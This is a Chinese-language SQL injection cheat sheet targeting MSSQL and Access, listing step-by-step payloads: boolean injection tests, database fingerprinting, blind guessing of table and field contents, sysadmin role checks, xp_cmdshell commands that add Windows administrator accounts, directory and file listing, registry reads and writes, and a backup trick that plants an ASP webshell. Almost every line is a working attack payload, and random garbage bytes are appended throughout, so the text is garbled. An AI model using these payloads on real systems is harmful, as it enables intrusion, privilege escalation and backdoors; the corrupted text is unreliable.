1.判断是否有注入;and 1=1 ;and 1=2 PLQLGb4f_;
2.初步判断是否是mssql ;and user>0 b��^&nr[DC
2�~!�+EH�
3.注入参数是字符'and [查询条件] and ''=' &&|c-m�D+*
QR[i9'`�<�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' V?-�O��I�>
.Za�)S5��U
5.判断数据库系统 LX�;" M�z>
=U3rOYb�P;
;and (select count(*) from sysobjects)>0 mssql , n�4�7�.S
b,-qy��JW6
;and (select count(*) from msysobjects)>0 access
W�[oQp2 =
�ck#MpQ!An
),4�c�b�
h$a%�PaV�f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 !�^(?�C@TQ
N�r0}*8#j�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �o�z/Nx{bg
{��h}e� 9�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Q1u�/QA:z7
yx�L�(mt�8
9.(1)猜字段的ascii值(access) ~�cW�,B}��
�h�D>c��xo
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E9�v_��6d[
>vc$3�%L[$
(2)猜字段的ascii值(mssql) V��K]�sK e
qBcwM=R3�P
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 0tp3m���Yd
$g]�'$PB�
10.测试权限结构(mssql) 9\a;7�5��a
"�tg��?�V�
pcO0x��rI�
v�F��l06N2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~Jx0#+z9V�
I@o42%�w�2
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �Eh|v>Yew�
{|/y/xYgy'
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @�hj5j;NHK
'�(�y��jq<
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 05/'qf7P,U
�E@92hB4D"
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �:��6y;��U
�G��q9�pJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- v0�'`K 5M
"�/�q�m,$
;and 1=(select IS_MEMBER('db_owner'));-- y-^�m�����
P�uGc{k�t�
Kz2s�{y�~?
�s|o+
�Im
11.添加mssql和系统的帐户 �4~mmP.c��
<�~R{U>�zO
;exec master.dbo.sp_addlogin username;-- 0�iTh �|K0
;exec master.dbo.sp_password null,username,password;-- �qfl�#ki`,
�XmX{e.<NZ
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- |Y]4PT#EE
/�m(v5�v7(
;exec master.dbo.xp_cmdshell 'net user username password 5.zv0tJ�ku
%<[U\TL`��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- b*W01i��st
�)|`|Usn#[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �M
Ql�x&.>
d�b0���]D\
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ]�)H�[>.?K
VJ(�)sbl{k
&BS*C�} },
NX9K�%J���
12.(1)遍历目录 *_C�zCl^
�
ud�:�5_*��
;create table dirs(paths varchar(100), id int) Z@�Q�J5F1y
N
Obw/9JO�
;insert dirs exec master.dbo.xp_dirtree 'c:\' DRuG5|�{I:
YK6zN>M}E
;and (select top 1 paths from dirs)>0 /YT _~�q=:
ERz{, >�G?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Gsa��~zGN�
?5jq)x�d2�
!pAb�+6�~T
�8��a,�pDE
(2)遍历目录 L�@>$�
A�w
JJVdq-k+�`
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �P�iZU�_~A
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 r`5�s�vY��
�I*�hz�lE�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �r�%UsU�j�
\I�Cc�?8oL
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 y;x�Y74Nq�
�����w��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ^M�~Z_CQL2
�mq6�TwM
Dwg�_#G�Sr
\:�D"�#s%x
13.mssql中的存储过程 vj hh4�$k
<%GfF![�v
xp_regenumvalues 注册表根键, 子键 >dYN@cB$}
#[ ?E�,��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 y';"tD��Fb
$s"�{C"4�q
xp_regread 根键,子键,键值名 } z�a�"r�U
Z|6,*XEc �
;exec xp_regread �=�C�g1I\
�s{���dgUX
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 32x[�6��"T
h��G�8<@�
xp_regwrite 根键,子键, 值名, 值类型, 值 83g$k
9lG.
-cP7`.��a
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 (,�OF<<OH�
^g
N/�5�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 $i]G'��f�j
AtYqD�<hl:
xp_regdeletevalue 根键,子键,值名 Vh'�H =J��
dBNx2T}_0�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `Y_G*�b.Rm
GvI8W)d3,R
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Nn='9s9F?}
S?<h�s,��
�#b��w�GDF
#�$ooV1�E
14.mssql的backup创建webshell gnN"��6r1�
��rBUWzpE"
use model 2wwJ>iR`��
O
8XHaVLg3
create table cmd(str image); �*~0U�4kw+
7Xf52�\�7n
insert into cmd(str) values (''); K�n,td��:(
1�4z�
?X%
backup database model to disk='c:\l.asp'; EFn[[<&><t
bZ�W��dd6�
|qz&d=�>��
TE�% �i�
�
15.mssql内置函数 J>8kJCh9g
8�e32NJ^k~
;and (select @@version)>0 获得Windows的版本号 9��:,ZG4�s
3*=��_vl�3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �/I �&w�h
L L?�
.�E
;and (select user_name())>0 爆当前系统的连接用户 ��A~({vb'
;(&S�1R�v9
;and (select db_name())>0 得到当前连接的数据库 �i�"d&U7�Q
S�FR��<T��
;��c�f��PS
<S3s=�=�Cg
16.简洁的webshell &a.A�8v)��
Z�� -fiJ75
use model (�\UpJlW��
���Y49&EQ
create table cmd(str image); N;gY5�;�0m
aM+�Am,n`@
insert into cmd(str) values (''); �B
*%�ey?
0�Ua&�_D"�
backup database model to disk='g:\wwwtest\l.asp';
